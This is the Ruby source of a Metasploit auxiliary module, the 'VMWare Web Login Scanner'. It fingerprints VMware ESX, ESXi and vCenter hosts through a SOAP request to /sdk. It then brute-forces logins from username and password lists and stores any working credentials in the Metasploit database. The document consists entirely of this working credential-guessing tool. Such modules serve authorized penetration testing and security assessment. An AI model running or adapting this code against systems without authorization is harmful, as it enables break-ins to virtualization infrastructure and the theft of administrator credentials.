VMWare Web Login Scanner

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::VIMSoap  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::AuthBrute  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'VMWare Web Login Scanner',  
'Description' => 'This module attempts to authenticate to the VMWare HTTP service  
for VmWare Server, ESX, and ESXI',  
'Author' => ['theLightCosine'],  
'References' =>  
[  
[ 'CVE', '1999-0502'] # Weak password  
],  
'License' => MSF_LICENSE,  
'DefaultOptions' => { 'SSL' => true }  
)  
  
register_options(  
[  
OptString.new('URI', [true, "The default URI to login with", "/sdk"]),  
Opt::RPORT(443)  
])  
end  
  
def report_cred(opts)  
service_data = {  
address: opts[:ip],  
port: opts[:port],  
service_name: 'vmware',  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: opts[:user],  
private_data: opts[:password],  
private_type: :password  
}.merge(service_data)  
  
login_data = {  
last_attempted_at: DateTime.now,  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::SUCCESSFUL,  
proof: opts[:proof]  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def run_host(ip)  
return unless is_vmware?  
each_user_pass { |user, pass|  
result = vim_do_login(user, pass)  
case result  
when :success  
print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"  
report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)  
return if datastore['STOP_ON_SUCCESS']  
when :fail  
print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"  
end  
}  
end  
  
# Mostly taken from the Apache Tomcat service validator  
def is_vmware?  
soap_data =  
%Q|<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<env:Body>  
<RetrieveServiceContent xmlns="urn:vim25">  
<_this type="ServiceInstance">ServiceInstance</_this>  
</RetrieveServiceContent>  
</env:Body>  
</env:Envelope>|  
  
res = send_request_cgi({  
'uri' => normalize_uri(datastore['URI']),  
'method' => 'POST',  
'agent' => 'VMware VI Client',  
'data' => soap_data  
}, 25)  
  
unless res  
vprint_error("#{rhost}:#{rport} Error: no response")  
return false  
end  
  
fingerprint_vmware(res)  
rescue ::Rex::ConnectionError => e  
vprint_error("#{rhost}:#{rport} Error: could not connect")  
return false  
rescue => e  
vprint_error("#{rhost}:#{rport} Error: #{e}")  
return false  
end  
  
def fingerprint_vmware(res)  
unless res  
vprint_error("#{rhost}:#{rport} Error: no response")  
return false  
end  
return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')  
  
os_match = res.body.match(/<name>([\w\s]+)<\/name>/)  
ver_match = res.body.match(/<version>([\w\s\.]+)<\/version>/)  
build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/)  
full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)  
  
if full_match  
print_good "#{rhost}:#{rport} - Identified #{full_match[1]}"  
report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1])  
end  
  
unless os_match and ver_match and build_match  
vprint_error("#{rhost}:#{rport} Error: Could not identify host as VMWare")  
return false  
end  
  
if os_match[1].include?('ESX') || os_match[1].include?('vCenter')  
# Report a fingerprint match for OS identification  
report_note(  
:host => rhost,  
:ntype => 'fingerprint.match',  
:data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }  
)  
return true  
end  
end  
end  
`